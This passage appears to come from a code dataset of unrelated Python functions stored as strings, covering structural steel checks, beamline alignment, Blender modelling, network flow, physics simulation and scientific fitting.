exists!\\n')\r\n sys.exit(2)\r\n # Compute the shear strength of the panel zone\r\n phi = 1.0\r\n dc = bottom_column.section['d']\r\n tw = bottom_column.section['tw']\r\n bcf = bottom_column.section['bf']\r\n tcf = bottom_column.section['tf']\r\n db = left_beam.section['d']\r\n self.shear_force['Rn'] = 0.60 * steel.Fy * dc * tw * (1+(3*bcf*tcf**2)/(db*dc*tw))\r\n # Compute the doubler plate thickness\r\n if phi*self.shear_force['Rn'] >= self.shear_force['Ru']:\r\n # Panel zone shear strength is sufficient ==> no need for doubler plate\r\n self.doubler_plate_thickness = 0\r\n else:\r\n # Panel zone shear strength is not sufficient ==> need doubler plate\r\n required_tp = (self.shear_force['Ru'] - 0.60*steel.Fy*(3*bcf*tcf**2)/db) / (0.60*steel.Fy*dc)\r\n tp = 0.25 # Assumed doubler plate thickness\r\n while tp < required_tp:\r\n tp += 0.25 # Update the thickness at an increment of 0.25 until it reaches the requirement\r\n self.doubler_plate_thickness = tp", "def _grow_secondary(self, amt):\n self._resize_secondary(amt)", "def beam_align():\n\n # do nothing if there is a sample mounted to avoid collisions\n if smart_magnet.sample_detect.get() == 0:\n raise Exception(\"Sample mounted on gonio! Avoided collision\")\n\n # wait for attenuators to finish moving\n yield from bps.abs_set(mxatten, 0.002)\n yield from bps.sleep(5)\n\n # transition to BL and open shutter\n yield from bps.abs_set(gov_rbt, \"BL\", wait=True)\n yield from bps.mv(sht.r, 0)\n\n yield from bps.abs_set(rot_aligner.cam_hi.cam_mode, \"beam_align\")\n\n # which direction, x pos. pitch beam outboard (-), y pos. pitch beam up (+)\n scan_uid = yield from bp.count([rot_aligner.cam_hi], 1)\n centroid_x, centroid_y = (\n db[scan_uid].table()[rot_aligner.cam_hi.cv1.outputs.output1.name][1],\n db[scan_uid].table()[rot_aligner.cam_hi.cv1.outputs.output2.name][1],\n )\n\n if np.isclose(0, centroid_x) or np.isclose(0, centroid_y):\n raise Exception(\"No centroid detected!\")\n\n yield from bps.abs_set(kbt.hor.delta_px, (centroid_x - 320))\n yield from bps.abs_set(kbt.ver.delta_px, -(centroid_y - 256))\n\n def lin_reg(independent, dependent, goal, **kwargs) -> float:\n b = dependent\n A = np.matrix([[pos, 1] for pos in independent])\n p = (\n np.linalg.inv(A.transpose() * A)\n * A.transpose()\n * np.matrix(b.to_numpy()).transpose()\n )\n best = (goal - p[1]) / p[0]\n return best\n\n for axis, signal, center in (\n kbt.hor,\n rot_aligner.cam_hi.cv1.outputs.output1,\n 320,\n ), (kbt.ver, rot_aligner.cam_hi.cv1.outputs.output2, 256):\n # skip if we are within 1 um\n if abs(axis.delta_px.get()) > 2:\n scan_uid = yield from rel_scan_no_reset(\n [rot_aligner.cam_hi],\n axis,\n 0,\n 0.4 * -(axis.delta_px.get() / abs(axis.delta_px.get())),\n 10,\n )\n scan_df = db[scan_uid].table()\n best_voltage = lin_reg(\n scan_df[axis.readback.name],\n scan_df[signal.name],\n center,\n )\n yield from bps.mv(axis, best_voltage)\n yield from bps.sleep(1)\n\n # close shutters and reset attenuators for manual viewing\n yield from bps.mv(sht.r, 20)", "def edbl():\n bpy.ops.transform.edge_slide(value=self.btr, mirror=False, correct_uv=False)\n bpy.ops.mesh.bevel(offset=self.bofs/2 , segments=self.bss+1 , vertex_only=False)\n bpy.ops.mesh.select_less()\n bpy.ops.transform.shrink_fatten(value=(self.bts * -1) if self.dms == 1 else self.bts, use_even_offset=self.bev)\n bpy.ops.mesh.remove_doubles(threshold=self.brd)\n if self.brx == True:\n try:\n bpy.ops.mesh.looptools_relax(input='selected', interpolation='linear', iterations='3', regular=False)\n except AttributeError:\n self.report({'ERROR'},\"I'm sorry the addon 'Looptools' is not active or not installed.\")\n if self.dsp == 1:\n bpy.ops.mesh.bevel(offset=0.1, segments=2, vertex_only=False)\n bpy.ops.mesh.select_less()\n bpy.ops.transform.shrink_fatten(value=0.2, use_even_offset=False, mirror=False, proportional='CONNECTED',\n proportional_edit_falloff='SMOOTH', proportional_size=0.0839017)", "def sub_link_capacity(self, path, bw):\n \n # PART 1, TASK 3.4 sub bw to edges", "def fix_bone_lengths(self, b_armature_data):\n for b_edit_bone in b_armature_data.edit_bones:\n #don't change root bones\n if b_edit_bone.parent:\n # take the desired length from the mean of all children's heads\n if b_edit_bone.children:\n childheads = mathutils.Vector()\n for b_child in b_edit_bone.children:\n childheads += b_child.head\n bone_length = (b_edit_bone.head - childheads/len(b_edit_bone.children)).length\n if bone_length < 0.01:\n bone_length = 0.25\n # end of a chain\n else:\n bone_length = b_edit_bone.parent.length\n b_edit_bone.length = bone_length", "def make_shaped_repertoire(RNs):\n # get objective distribution\n bin_edges, obj_dist, volume = objective_distribution()\n # get an antigenic epitope sequence, and in case of nkey=1,2 check whether\n # it can populate all required bins, thus avoiding infinite loop below\n AgEpitope = get_AgEpitope(RNs)\n if cf.nkey == 1 or cf.nkey == 2:\n while 1:\n # get list of all possible binding partners and their energies\n all_partners = get_all_partners()\n all_energies = [E_best(partner, AgEpitope)\n for partner in all_partners]\n # check whether all bins are occupiable with these energies,\n # if not, get new epitope sequence\n indices = np.digitize(all_energies, bin_edges, right=True)\n ind_set = set(indices)\n ind_set.discard(0)\n # if all bins can be occupied, move on\n if ind_set == set(range(1, len(bin_edges))):\n break\n # else get a new epitope and check its validity\n else:\n AgEpitope = get_AgEpitope(RNs)\n # initialise empty list for counting how many seqs have been found per bin\n ist_dist = np.zeros(len(obj_dist))\n # seq_list for collecting identified sequences\n seq_list = []\n E_list = []\n # while ist_dist and obj_dist are not equal, get new sequences and position\n # them if they are useful\n # introduce a tolerance of how far bins are allowed to deviate from the\n # goal, as otherwise runtime explodes due to very long waiting times for\n # high binding energy codes in large nkey cases - allow an absolute\n # deviation of volume*tolerance % for each bin.\n abs_tol = volume * 0.005\n while np.sum(np.abs((ist_dist-obj_dist)) > abs_tol) > 0:\n ab = Ab_seq(RNs)\n Emax = E_best(ab, AgEpitope)\n # find index bin of this energy\n indx = np.digitize(Emax, bin_edges, right=True)\n # if the index is in the useful range and the bin is not yet full,\n # count the sequence and store it\n if indx in range(1, len(bin_edges)):\n if obj_dist[indx-1] - ist_dist[indx-1] > 0:\n ist_dist[indx-1] += 1\n seq_list.append(ab)\n E_list.append(Emax)\n\n return seq_list, E_list, AgEpitope", "def __init__(\n self, model_path, n_substeps, gripper_extra_height, block_gripper,\n has_object, target_in_the_air, target_offset, obj_range, target_range,\n distance_threshold, initial_qpos, reward_type, goal_high_prob,\n min_goal_extra_height=0.0, max_goal_extra_height=0.45,\n min_dist_between_objs=0.1, same_color_radius=0.5,\n terminate_on_success=False\n ):\n self.gripper_extra_height = gripper_extra_height\n self.block_gripper = block_gripper\n self.has_object = has_object\n self.target_in_the_air = target_in_the_air\n self.target_offset = target_offset\n self.obj_range = obj_range\n self.target_range = target_range\n self.distance_threshold = distance_threshold\n self.reward_type = reward_type\n self.goal_high_prob = goal_high_prob\n self.min_goal_extra_height = min_goal_extra_height\n self.max_goal_extra_height = max_goal_extra_height\n self.min_dist_between_objs = min_dist_between_objs\n self.same_color_radius = same_color_radius\n\n few_shot_robot_env.FewShotRobotEnv.__init__(\n self, model_path=model_path, n_substeps=n_substeps, n_actions=4,\n initial_qpos=initial_qpos, terminate_on_success=terminate_on_success\n )", "def oss_stacked(block, cut, laser):\r\n\tx0_1, x1_1, z0_1, taper_x_1, taper_y_1, layers_1, pyramid_angle_1 = oss_helper(block, cut, laser, cut[\"final_dimension_x\"]/2)\r\n\tx0_2, x1_2, z0_2, taper_x_2, taper_y_2, layers_2, pyramid_angle_2 = oss_helper(block, cut, laser, cut[\"final_dimension_y\"]/2)\r\n\tangle = math.radians(laser[\"kerf_angle\"]/2)\r\n\tgap = math.tan(pyramid_angle_1) * (cut[\"final_dimension_x\"]/2) + cut[\"gap_size\"]\r\n\tunit_length = gap + cut[\"base_height\"]\r\n\tmax_slices = math.floor(block[\"thickness\"]/unit_length)\r\n\ttaper_straight = math.tan(angle)*(laser[\"z_spacing\"])\r\n\r\n\tif cut[\"core\"] == \"yes\":\r\n\t\tcutlist = json.loads(vertical_core(block,cut,laser))\r\n\t\tcutlist.pop()\r\n\t\tcutlist.pop(0)\r\n\telse:\r\n\t\tcutlist = []\r\n\r\n\ta0 = -(90 + math.degrees(angle))\r\n\r\n\tz_shift = (cut[\"base_height\"] + gap) * math.sin(angle)\r\n\tx_shift = (cut[\"base_height\"] + gap) * math.cos(angle)\r\n\r\n\tx_delta = math.sin(angle) * block[\"origin_x\"]\r\n\ty_delta = math.sin(angle) * block[\"origin_y\"]\r\n\tz1_delta = math.cos(angle) * block[\"origin_x\"]\r\n\tz2_delta = math.cos(angle) * block[\"origin_y\"]\r\n\r\n\tcutlist.append([\"a_abs\",f\"{a0:.6f}\"])\r\n\tcutlist.append([\"c_abs\",str(block[\"physical_rotation\"])])\r\n\tcutlist.append([\"z_abs\",str(z0_1 + z2_delta)])\r\n\r\n\tif pyramid_angle_1 >= angle and pyramid_angle_2 >= angle:\r\n\r\n\t\tif cut[\"num_of_seeds\"] == \"max\":\r\n\t\t\tnum_slices = max_slices\r\n\t\telse:\r\n\t\t\tnum_slices = cut[\"num_of_seeds\"] + 1\r\n\t\t\r\n\t\tfor i in range(num_slices):\r\n\t\t\tcutlist = (cutlist\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_y\"]/2 - block[\"origin_x\"],x0_1 + y_delta,-cut[\"final_dimension_y\"]/2 - block[\"origin_x\"],x1_1 + y_delta,z0_1 + block[\"origin_y\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_1,taper_y_1,taper_straight,layers_1)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_2 + z1_delta)]] + [[\"c_abs\",\"90\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_x\"]/2 + block[\"origin_y\"],x0_2 + x_delta,-cut[\"final_dimension_x\"]/2 + block[\"origin_y\"],x1_2 + x_delta,z0_2 + block[\"origin_x\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_2,taper_y_2,taper_straight,layers_2)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_1 - z2_delta)]] + [[\"c_abs\",\"180\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_y\"]/2 + block[\"origin_x\"],x0_1 - y_delta,-cut[\"final_dimension_y\"]/2 + block[\"origin_x\"],x1_1 - y_delta,z0_1 - block[\"origin_y\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_1,taper_y_1,taper_straight,layers_1)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_2 - z1_delta)]] + [[\"c_abs\",\"270\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_x\"]/2 - block[\"origin_y\"],x0_2 - x_delta,-cut[\"final_dimension_x\"]/2 - block[\"origin_y\"],x1_2 - x_delta,z0_2 - block[\"origin_x\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_2,taper_y_2,taper_straight,layers_2)\r\n\t\t\t\t\t\t )\r\n\t\t\tz0_1 = z0_1 + z_shift\r\n\t\t\tz0_2 = z0_2 + z_shift\r\n\t\t\tx0_1, x1_1, x0_2, x1_2 = x0_1 - x_shift, x1_1 - x_shift, x0_2 - x_shift, x1_2 - x_shift\r\n\t\t\tcutlist.append([\"c_abs\",str(block[\"physical_rotation\"])])\r\n\t\t\tcutlist.append([\"z_abs\",str(z0_1 + z2_delta)])\t\r\n\telse:\r\n\t\traise Exception(\"Pyramid angle too small\")\r\n\r\n\tcutlist.insert(0, [\"set_trigger4\", \"1\", \"0\", \"7\", \"8\", \"45\"])\r\n\tcutlist.append([\"stop_trigger\"])\r\n\treturn json.dumps(cutlist)", "def BrockBird_scaling(fluid,network,propname,sigma_o,To,**params):\n Tc = fluid.get_pore_data(prop='Tc')\n Ti = network.get_pore_data(phase=fluid,prop='temperature')\n Tro = To/Tc\n Tri = Ti/Tc\n value = sigma_o*(1-Tri)**(11/9)/(1-Tro)**(11/9)\n network.set_pore_data(phase=fluid,prop=propname,data=value)", "def __init__(self, connection_type, steel, beam_dead_load, beam_live_load, span,\r\n left_beam=None, right_beam=None, top_column=None, bottom_column=None):\r\n self.connection_type = connection_type\r\n # The dictionary used to store the RBS dimensions\r\n self.left_RBS_dimension = {}\r\n self.right_RBS_dimension = {}\r\n # The dictionary used to store the probable moment\r\n self.moment = {}\r\n # The dictionary used to store the shear force\r\n self.shear_force = {} # keys:\r\n # A scalar used to denote the doubler plate thickness\r\n self.doubler_plate_thickness = 0\r\n # A dictionary used to store the failure mode (if any)\r\n self.is_feasible = {} # keys: 'geometry limit', 'flexural strength', 'shear strength', 'SCWB'\r\n # Define a boolean flag which denotes the overall check results (True means OK.)\r\n self.flag = None\r\n\r\n # Call methods to initialize the attributes listed above\r\n self.check_column_beam(connection_type, left_beam, right_beam, top_column, bottom_column)\r\n self.extract_reduced_beam_section(connection_type, left_beam, right_beam)\r\n self.compute_probable_moment_RBS(connection_type, steel, left_beam, right_beam)\r\n self.compute_shear_force_RBS(connection_type, beam_dead_load, beam_live_load, span, bottom_column)\r\n self.compute_probable_moment_column_face(connection_type)\r\n self.compute_plastic_moment(connection_type, steel, left_beam, right_beam)\r\n self.check_moment_column_face(connection_type)\r\n self.check_shear_strength(connection_type, beam_dead_load, beam_live_load, left_beam, right_beam)\r\n self.check_column_beam_relationships(connection_type, steel, left_beam, right_beam, top_column, bottom_column)\r\n self.determine_doubler_plate(connection_type, steel, left_beam, right_beam, bottom_column, top_column)", "def rigid_rings(self):\n raise NotImplementedError", "def update_flow(self):\n start_nodes = []\n end_nodes = []\n capacities = []\n # (1): add all edges (u, v) with capacity ub-lb\n B = self.get_max_lb()*(self.num_edges() - len(self) + 2)\n for arc in self.arc_info.keys():\n if self.arc_info[arc][\"upper_bound\"] == float('inf'):\n self.arc_info[arc][\"upper_bound\"] = B\n for arc in self.arc_info.keys():\n start_nodes.append(self.arc_info[arc][\"start\"])\n end_nodes.append(self.arc_info[arc][\"destin\"])\n capacities.append(int(self.arc_info[arc][\"upper_bound\"]\\\n - self.arc_info[arc][\"lower_bound\"]))\n # (2): add edge (t, s) with capacity B\n # B = max_lb * (m - n + 2)\n B = self.get_max_lb()*(self.num_edges() - len(self) + 2)\n if B == 0:\n #B = float('inf')\n B = 100000\n start_nodes.append(self.sink())\n end_nodes.append(self.source())\n capacities.append(int(B))\n # (3): for all verts, if exc > 0, add edge (s', v) with capacity exc(v),\n # and if exc < 0, add edge(s', v) with capacity -exc(v)\n s_prime = max(self.vertices) + 1\n t_prime = max(self.vertices) + 2\n print(\"s'={}, t'={}\".format(s_prime, t_prime))\n for v in self:\n #print(\"vert {} in arcs: {}\".format(v,\n # self.in_arcs_lists[v]))\n # compute exc: lower bounds of in - lower bounds of out\n sum_lb_in = 0\n for in_arc in self.in_arcs_lists[v]:\n sum_lb_in += self.arc_info[in_arc][\"lower_bound\"]\n sum_lb_out = 0\n #print(\"vert {} out arcs: {}\".format(v,\n # self.out_arcs_lists[v]))\n for out_arc in self.out_arcs_lists[v]:\n sum_lb_out += self.arc_info[out_arc][\"lower_bound\"]\n exc = sum_lb_in - sum_lb_out\n #print(\"exc is {}\".format(exc))\n if exc > 0:\n start_nodes.append(s_prime)\n end_nodes.append(v)\n capacities.append(int(exc))\n else:\n start_nodes.append(v)\n end_nodes.append(t_prime)\n capacities.append(int(-exc))\n # solve maxflow\n #print(\"s' is {} and t' is {}\".format(s_prime, t_prime))\n max_flow = pywrapgraph.SimpleMaxFlow()\n for u, v, cap in zip(start_nodes, end_nodes, capacities):\n #print(\"Adding edge {}, {} with cap {}\".format(u,v,cap))\n max_flow.AddArcWithCapacity(u, v, cap)\n success = True\n if max_flow.Solve(s_prime, t_prime) == max_flow.OPTIMAL:\n #print('Max flow: {}'.format( max_flow.OptimalFlow()))\n #print(' Arc Flow / Capacity')\n for i in range(max_flow.NumArcs()):\n # print('%1s -> %1s %3s / %3s' % (\n # max_flow.Tail(i),\n # max_flow.Head(i),\n # max_flow.Flow(i),\n # max_flow.Capacity(i)))\n # check that (s', v) edges are saturated (once we find a false,\n # stay false forever)\n if success:\n if max_flow.Tail(i) == s_prime:\n success = max_flow.Flow(i) == max_flow.Capacity(i)\n else:\n success = False\n print('There was an issue with the max flow input.')\n if success:\n # update the flows to be the flow found from maxflow problem\n for i in range(max_flow.NumArcs()):\n # if this is an original arc, update the flow\n if max_flow.Tail(i) != s_prime \\\n and max_flow.Head(i) != t_prime \\\n and not (max_flow.Tail(i) == self.sink() \\\n and max_flow.Head(i) == self.source()):\n # update arc\n start = max_flow.Tail(i)\n destin = max_flow.Head(i)\n arc = self.get_arc(start, destin)\n new_flow = self.arc_info[arc][\"lower_bound\"] + max_flow.Flow(i)\n old_flow = self.arc_info[arc][\"weight\"]\n self.arc_info[arc][\"weight\"] = new_flow\n #print(\"Edge {} {} adjusted from {} to {}\".format(\n # start,\n # destin,\n # old_flow,\n # new_flow\n # ))\n self.check_conservation_of_flow() # check that solution is valid\n return True\n else:\n return False", "def pad(self):\n if self._mg_problem.boundaries[0] == 'periodic':\n # left side\n self.left[:] = self.mid[-self.borders[0]:]\n # right side\n self.right[:] = self.mid[:self.borders[1]]\n elif self._mg_problem.boundaries[0] == 'dirichlet':\n\n # left from border\n l_f_b = self.space_tensor[0:self.borders[0]]\n # right_from_border\n r_f_b = self.space_tensor[-self.borders[1]:]\n # left side\n self.left[:] = self.fl(l_f_b)\n # right side\n self.right[:] = self.fr(r_f_b)", "def add_link_capacity(self, path, bw):\n\n # PART 1, TASK 3.4 add bw to edges", "def initOpt(self):\n\t\tself.optNodes=[]\n\t\tself.optNode=-1\n\t\tif self.m.headType=='Bracke':\n\t\t\tbracke=True #one head per decice\n\t\telse:\n\t\t\tbracke=False\n\t\tif '2a' in self.m.type:\n\t\t\t#this is strictly for 2000 plants/ha, i.e 10 spots per half circle and [4,9]m crane dimensions\n\t\t\tw1 = 1.3\n\t\t\tw2 = 1.0\n\t\t\tif self.mountPoint is 'left':\n\t\t\t\tfor r in [self.m.craneMaxL-w2, self.m.craneMinL+w2]:\n\t\t\t\t\tth=pi-asin(w1/r)\n\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\tdth=(pi-2*asin(w1/r))/3.\n\t\t\t\tth-=dth\n\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\tr=self.m.craneMaxL-w2\n\t\t\t\tth=pi-asin(w1/r)\n\t\t\t\tdth=(pi-asin(w1/r))/5. #outer\t\t\t\n\t\t\t\tth-=3*dth\n\t\t\t\tfor th in [th, th-dth]:\n\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\telse:\n\t\t\t\tr=self.m.craneMaxL-w2\n\t\t\t\tth=pi-asin(w1/r)\n\t\t\t\tdth=(pi-asin(w1/r))/5. #outer\n\t\t\t\tth-=dth\n\t\t\t\tfor th in [th, th-dth]:\n\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\tr=self.m.craneMinL+w2\n\t\t\t\tdth=(pi-2*asin(w1/r))/3.\n\t\t\t\tth=pi-asin(w1/r)-2.*dth\n\t\t\t\tfor th in [th, th-dth]:\n\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\tr=self.m.craneMaxL-w2\n\t\t\t\tth=asin(w1/r)\n\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\telse:\n\t\t\tassert len(self.m.pDevs)==0 or len(self.m.pDevs)==1 and self.m.pDevs[0]==self\n\t\t\tw1 = self.plantAreaW/2.\n\t\t\tw2 = self.plantAreaL/2.\n\t\t\tif bracke:\n\t\t\t\tspaceMin=self.m.plantMinDist\n\t\t\telse:\n\t\t\t\tspaceMin=self.plantAreaW-self.plantHeads[0].width+self.m.plantMinDist #minimum spacing for angular movements.\n\t\t\tn=ceil(self.m.nSeedlingsPWArea/len(self.plantHeads)) #due to several plantHeads per device\n\t\t\tnLeft=n\n\t\t\tlInner = (self.m.craneMinL+w2)*(pi-2*asin(w1/(self.m.craneMinL+w2)))\n\t\t\tsLength = sqrt(pow(self.m.craneMaxL-w2,2)-pow(w1,2))-sqrt(pow(self.m.craneMinL+w2,2)-pow(w1,2))\n\t\t\tlOuter =(self.m.craneMaxL-w2)*(pi-2*asin(w1/(self.m.craneMaxL-w2)))\n\t\t\tlMiddle=0\n\t\t\trList=[self.m.craneMinL+w2, 'border', self.m.craneMaxL-w2]\n\t\t\tlTot=lInner+sLength+lOuter\n\t\t\trMiddle=-1\n\t\t\tdr=self.m.craneMaxL-w2-(self.m.craneMinL+w2)\n\t\t\tif dr>2*self.m.plantMinDist: #create another sweep\n\t\t\t\trMiddle=(self.m.craneMaxL-w2)-dr/2.\n\t\t\t\tlMiddle=rMiddle*(pi-2*asin(w1/rMiddle))\n\t\t\t\trList.append(rMiddle)\n\t\t\t\tlTot+=lMiddle\n\t\t\tlCurr=0\n\t\t\tfor r in rList:\n\t\t\t\tif r is 'border':\n\t\t\t\t\tr=self.m.craneMinL+w2\n\t\t\t\t\tL=sLength\n\t\t\t\t\tnSection=nLeft*(L/(lTot-lCurr))\n\t\t\t\t\t#dr=(L-2*dr)/nSection =>\n\t\t\t\t\tdr=L/(nSection+2.)\n\t\t\t\t\tif dr<self.m.plantMinDist: dr=self.m.plantMinDist\n\t\t\t\t\ta=0\n\t\t\t\t\twhile r<(self.m.craneMaxL-w2)-2*dr:\n\t\t\t\t\t\tr+=dr\n\t\t\t\t\t\tth=asin(w1/(r))\n\t\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\t\t\ta+=1\n\t\t\t\telse:\n\t\t\t\t\tL=r*(pi-2*asin(w1/r))\n\t\t\t\t\tnSection=nLeft*(L/(lTot-lCurr)) #how much to plant on this section\n\t\t\t\t\tdth=(pi-2*asin(w1/r))/nSection\n\t\t\t\t\tif dth*r < spaceMin: dth=spaceMin/r\n\t\t\t\t\tif r == self.m.craneMinL+w2 or r==rMiddle:\n\t\t\t\t\t\tdth=-dth\n\t\t\t\t\t\tth=pi-asin(w1/(r))\n\t\t\t\t\telse:\n\t\t\t\t\t\tth=asin(w1/(r))\n\t\t\t\t\ta=0\n\t\t\t\t\twhile abs(th-pi/2.)-0.00001<=(pi-2*asin(w1/r))/2.:\n\t\t\t\t\t\tself.optNodes.append(self.m.getCartesian([r,th]))\n\t\t\t\t\t\tself.idealSpots.append(self.m.getCartesian([r,th]))\n\t\t\t\t\t\tth+=dth\n\t\t\t\t\t\ta+=1\n\t\t\t\tif a<nSection: #if spaceMin got into it and interfered.\n\t\t\t\t\tnSection=a\n\t\t\t\tnLeft-=nSection\n\t\t\t\tlCurr+=L", "def _shrink_secondary(self, amt):\n self._resize_secondary(-amt)", "def make_bwfull(w,minZ,maxZ,ires=1,fixw=False,m=mz0):\n cmds = []\n # coefficients for the amplitudes\n cmds.append(\"A[1,0,1000000]\")\n cmds.append(\"B[1,0,1000000]\")\n cmds.append(\"C[10000.0,0,1000000]\")\n # amplitudes\n cmds.append('m[%s,%s,%s]'%(m,minZ,maxZ))\n cmds.append('g[2.49,0,10]')\n denom = '((x^2-m^2)^2+x^4*g^2/m^2)'\n cmds.append(\"expr::z_rbw('x^2/%s',x,m,g)\"%denom)\n cmds.append(\"expr::z_int('(x^2-m^2)/%s',x,m,g)\"%denom)\n cmds.append(\"expr::z_rad('1/(x^2)',x)\")\n # resolution model\n cmds += resolutions[ires]()\n [w.factory(cmd) for cmd in cmds]\n # any parameter adjustments\n if True:\n w.var('r_m').setConstant(kTRUE) if w.var('r_m') else None\n w.var('rt_m').setConstant(kTRUE) if w.var('rt_m') else None\n w.var('g').setConstant(kTRUE) if w.var('g') and fixw else None\n # sum-of-amplitudes pdf\n lshape = RooRealSumPdf('lshape','lshape',RooArgList(w.function('z_rad'),w.function('z_int'),w.function('z_rbw')),RooArgList(w.var('A'),w.var('B'),w.var('C')))\n getattr(w,'import')(lshape)\n # convolution\n pdf = w.pdf('lshape')\n if w.pdf('res'):\n w.var('x').setBins(10000,'cache')\n cmd = 'FCONV::sum(x,lshape,res)'\n w.factory(cmd)\n pdf = w.pdf('sum')\n return pdf, kFALSE", "def __init__(self, length=None, width=None, height=None, material=None, adhesion_material=None,\n dielectric_coating=None):\n self.length = length\n self.linspace_x = np.linspace(-length/2, length/2, num=100)\n self.width = width\n self.height = height\n self.material = material\n\n if self.material.thickness:\n if self.material.thickness != self.height:\n raise ValueError(\"BPE height must equal BPE material thickness\")\n\n # adhesion layer used for thin metal film BPE\n self.adhesion_material = adhesion_material\n\n # dielectric coating on top of BPE\n if dielectric_coating:\n self.dielectric_coating = dielectric_coating\n else:\n self.dielectric_coating = material_solid(name='no_dielectric', permittivity=1, thickness=1e-12, Ka=6, Kb=2, reaction_site_density=5)", "def __init__(self, kBoundedRing):\n KBoundedQuotientBasis.__init__(self, kBoundedRing, 'HLP')\n\n Sym = kBoundedRing.ambient()\n Sym.hall_littlewood(kBoundedRing.t).P().module_morphism(self.retract,codomain=self).register_as_coercion() # morphism from HLP to k-bounded HLP\n km = kBoundedRing.km()\n self.module_morphism(self._HLP_to_mk_on_basis, codomain=km, triangular='lower', unitriangular=True).register_as_coercion() # morphism from k-bounded-HLP to k-bounded-m\n km.module_morphism(self._m_to_kHLP_on_basis, codomain=self, triangular='lower', unitriangular=True).register_as_coercion() # morphism from k-bounded-m to k-bounded-HLP", "def route_input_B(self):\n xoffset = self.pmos.poly_positions[0].x \\\n + self.pmos_position2.x\n yoffset = self.A_position.y \\\n + max(drc[\"minwidth_metal2\"], self.poly_contact.second_layer_width) + drc[\"metal2_to_metal2\"]\n self.B_position = vector(xoffset, yoffset)\n offset = self.B_position - vector(0, 0.5 * self.poly_contact.width) \n self.add_contact(layers=(\"poly\", \"contact\", \"metal1\"),\n offset=offset,\n rotate=90)\n\n self.add_rect(layer=\"poly\",\n offset=offset,\n width=-(self.poly_contact.first_layer_position.y + drc[\"minwidth_poly\"]),\n height=self.poly_contact.first_layer_width)\n self.add_layout_pin(text=\"B\",\n layer=\"metal1\",\n offset=[0,\n self.B_position.y - 0.5 * drc[\"minwidth_metal1\"]],\n width=self.B_position.x,\n height=drc[\"minwidth_metal1\"])", "def __init__(self):\r\n\t\tsuper(Empty, self).__init__()\r\n\r\n\t\t# Initialize all of the objects\r\n\t\tground = self.world.CreateStaticBody(\r\n\t\t\tshapes=[ \r\n\t\t\t\tb2EdgeShape(vertices=[(-40,0),(40,0)])\r\n\t\t\t\t#~ b2EdgeShape(vertices=[(-1.1,-40),(-1.1,40)]),\r\n\t\t\t\t]\r\n\t\t) \r\n\t\tbox=b2FixtureDef(\r\n\t\t\tshape=b2PolygonShape(box=(0.3,0.3)),\r\n\t\t\tdensity=0.01,\r\n\t\t\tfriction=0.3)\t\t\r\n\t\t\r\n\t\tself.q = [qcopter(self.world,self.renderer,1,0.05,-8,8,0,1)]##,qcopter(self.world,self.renderer,1,0.1,-12,8,0,0)]\r\n\t\r\n\t\t(self.kp,self.ki,self.kd) = self.q[0].GetCoefs(self.q[0].configer)\r\n\t\t\r\n\t\t# The platform\r\n\t\t#~ fixture=b2FixtureDef(\r\n\t\t\t#~ shape=b2PolygonShape(box=(0.02,4.5)), \r\n\t\t\t#~ density=1,\r\n\t\t\t#~ friction=0.6,\r\n\t\t#~ )\t\t\t\r\n\r\n\t\t#~ self.platform=self.world.CreateDynamicBody(position=(-8,4.5), fixtures=fixture, )\r\n\t\t\r\n\t\t#~ self.platform.type=b2_staticBody\r\n\t\tif not(self.q[0].x_pid or self.q[0].y_pid):\t\r\n\t\t\tself.world.CreateRevoluteJoint(\r\n\t\t\t\tbodyA=self.q[0].body,\r\n\t\t\t\tbodyB=ground,\r\n\t\t\t\tanchor=(self.q[0].GetPos().x,self.q[0].GetPos().y),\r\n\t\t\t\tmaxMotorTorque=0,\r\n\t\t\t\tenableMotor=False\r\n\t\t\t)\r\n\t\t\t\t\r\n\t\tfor i in xrange(10):\r\n\t\t\tfor j in xrange(5+i/5):\r\n\t\t\t\tself.world.CreateDynamicBody(\r\n\t\t\t\t\tfixtures=box,\r\n\t\t\t\t\tposition=(i*3-10, 1+1*j)\r\n\t\t\t\t)", "def add_stretch() -> NoReturn:\n DiagramFieldView.__diagram_field.__group_layout.addWidget(\n DiagramFieldView.__diagram_field.__stretch_widget, 10, Qt.AlignBottom)", "def bvlprms():\n # cretate modifrs \"BEVEL\"\n bpy.ops.transform.edge_bevelweight(value=1)\n bpy.ops.object.modifier_add(type='BEVEL')\n bnm = bpy.context.object.modifiers[- 1].name\n # my paramtrs a \"BEVEL\"\n bpy.context.object.modifiers[bnm].use_clamp_overlap = self.bclmp\n bpy.context.object.modifiers[bnm].limit_method = 'WEIGHT'\n bpy.context.object.modifiers[bnm].width = self.lst2\n bpy.context.object.modifiers[bnm].segments = 6\n bpy.context.object.modifiers[bnm].show_in_editmode = self.bedt\n bpy.context.scene.objects.active = bpy.context.scene.objects.active", "def pwlFly(site_residuals, azSpacing=0.5,zenSpacing=0.5):\n tdata = 